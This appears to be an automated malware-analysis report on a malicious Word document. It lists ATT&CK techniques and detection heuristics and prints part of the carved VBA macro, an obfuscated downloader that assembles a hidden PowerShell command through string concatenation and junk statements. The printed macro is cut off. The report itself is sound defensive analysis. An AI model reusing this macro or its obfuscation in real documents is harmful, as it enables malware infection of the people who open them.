Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. The macro is configured to auto-execute via the AutoOpen function and uses obfuscated string concatenation to construct and execute a PowerShell command. This command is likely intended to download and execute a second-stage payload, as indicated by the 'Doc.Downloader' ClamAV detection name.
Heuristics (6)

- ClamAV: Doc.Downloader.Valyria-6666903-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6666903-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49670 bytes | 481640d2903e020feaad8f8cdca6d718a548d77eb0477897862f92299bcf4188 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ROwarMvqnjb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lRsNWZCwJkzG"
Function VVjinsUG()
On Error Resume Next
VarType TypeName(njbOA - rcbiia)
VarType 73547 - 81888
sEWcVu = "mD" + " " + " " + "/v^ ^" + " /c" + " " + CStr(Chr(ItmZjiErTu + vkDLMBSKdjWrjt + 34 + uBrWFcSRKHsos + RlWfIbuaR)) + "SeT " + "^ " + "V^x" + "J^=^p" + "^o" + "^we" + "rs" + "@e^"
IsArray ibiiOF - FtiOzG
VIPbZF = 75523 + 13715
VIPbZF = ioShd * CbXbq / 72238 / NwYnQ
VarType ahAqYH / RNkJm
LwqoZkK = "l" + "^l" + "^" + " ^" + "-e ^J^A" + "B" + "vA" + "E8Aa^Q^" + "A" + "9^" + "AG^" + "4^"
VarType Rnd(FIsSDU)
VIPbZF = 41134 - aBbQiv / 82984 - wNbzG
vnnJBRnjMlP = "A^" + "ZQ^B^" + "3AC" + "0A" + "^b^wB" + "]^AG^" + "o^A"
IsArray Str(AtFIu)
VarType asvFb + vSVZfa - 28520 + tPFvA
VIPbZF = 19960 - iChiSw + jwGTzd + 53624
mRDOShacr = "Z^QB^j^" + "A^iQ" + "^A" + "'A^" + "B^,AGU" + "A^dA^Au" + "^A" + "F^\^" + "AZQ^B]^"
VIPbZF = Round(48544 / PwRXq * 91147 - iBAUm)
VIPbZF = CDate(qYUMt)
VarType kJfOs + tOzip
qqOIJufz = "A" + "E^MA^b^" + "A^B^p^" + "A^G" + "U" + "Ab("
VarType 88604 / XmnEjp
IsArray zrHfG + 49389
uVLiN = "^" + "B^0^ADs" + "^A^JA" + "^BJ^A" + "^iY^AZ" + "AA9^A"
VIPbZF = Sgn(82)
VarType CDate(275787575)
kQMBH = "C^\A^a^" + "AB0" + "^A" + "iQA\^AA" + "^_AC8" + "AL^w" + "A[" + "^" + "A" + "^"
VarType CoDPuB * ftGHB
VIPbZF = Sqr(46915 / iiRUs)
VarType Tan(44136 - CmUXZ * 98111 - Yzocc)
VIPbZF = 10155 * jOCwW - 75150 / dwPEb
VarType Month(89529 * vGQRZi)
WVSvfziazSE = "G" + "0^A^" + "d" + "^Q^" + "B^[A^G" + "^k^A^Y^" + "w^Au^AG" + "4AZ" + "Q^B" + "^0AC^8"
VIPbZF = CCur(59837 + 71276 - 16026 + AlCzc)
VIPbZF = Int(233761844)
hTMLItGzNwa = "A^,Q" + "BV" + "A^F^oA" + "a" + "(BA" + "^" + "AG" + "(Ad^A^" + "B^0A^"
IsArray 78275 / hjfOiR / 85188 / roZTP
IsArray TimeValue(TizrJD)
VIPbZF = Fix(ikTIm / iiKwJv / 29034 + psAjRt)
doGbM = "i^A" + "^A^,(" + "AvAC8Aa" + "(^BvAG" + "^'A^YQ" + "^"
VarType 62421 * NXJpR
VIPbZF = 54771 + nrwDzu * ctRrS * vrmLd
VIPbZF = nAYziP + GbJFO
VarType Second(pjNXLQ - MazMc * 5657 / NjBaR)
VIPbZF = Int(sLipE)
sfavqkkvc = "B" + "yA^G^'^" + "A^YQ" + "^" + "A^u^"
VVjinsUG = sEWcVu + LwqoZkK + vnnJBRnjMlP + mRDOShacr + qqOIJufz + uVLiN + kQMBH + WVSvfziazSE + hTMLItGzNwa + doGbM + sfavqkkvc
VarType Month(PoWCjz)
IsArray LCase(52361 - 99299 * wDiYs - 64217)
VarType CDate(1869)
VarType Sgn(808)
End Function
Function jojspvYDmX()
On Error Resume Next
IsArray 4949 + FOQUiK
VarType Fix(MbjqUZ)
aYzJMcQT = "A" + "^G^M" + "^A^bwB" + "t" + "^AC8Adw" + "B^w" + "^AC" + "0^AY^"
VarType XriWld / FJCch - qowWjI + PPJKtP
VarType Fix(FjEXk - ALYXT)
IsArray CVar(28677 * YIICc)
VarType Atn(90219 - wqrWRI)
hlNCWOST = "wBvA" + "G4" + "^" + "A^d" + "^AB" + "^" + "l^" + "AG4A^" + "d^A^A" + "vA" + "^D\A^"
IsArray Log(55830 - FizZz)
WlwKDIPkV = ".(B^k" + "A^" + "i'^" + "Ad(^" + "B^0A^" + "Gw^A" + "^" + "Q^AB^o" + "^A^" + "i^Q" + "^A^d^A"
IsArray 67795 / dXwPXX - 256 - ACqmmX
VarType Tan(NfNjsc)
USnai = "^" + "B^w" + "A^" + "D^o^A^" + "Lw^Av" + "Ai^\^Ad" + "wB3A" + "C^4A^e"
IsArray CDate(fjPzLD)
AfSIKK = "^" + "Q" + "B^}AG" + "^EAb" + "(B{" + "AG(" + "A^" + "d^" + "QB^@^" + "AC4AY" + "^w^B" + "v^A^" + "G^0A"
IsArray Second(RWzbUw - 33279 * hQmjS * oojYk)
qCkwqB = "Lw^BVA" + "E^A^A^a" + "^AB^" + "0^" + "A^i^Q"
jojspvYDmX = aYzJMcQT + hlNCWOST + WlwKDIPkV + USnai + AfSIKK + qCkwqB
VIPbZF = Hex(SERsr * qpwltr)
End Function
Function KBZHEC()
On Error Resume Next
IsArray TimeValue(mLPRZu)
VIPbZF = Val(OMVbL)
IsArray 59589 * szQEv / bHhbs + ApbFz
tkiojUMMj = "A\^A^A_" + "^" + "AC^8A" + "LwB0A^G" + "(AZQ"
IsArray Str(ViYFd)
VarType Sin(fWIfO)
IsArray Atpkq * kHkzCW + ZlQcJ - SzKZLa
VarType Month(vlYwi / johQPL)
AsHwcfUZCi = "^" + "B
```

... (truncated)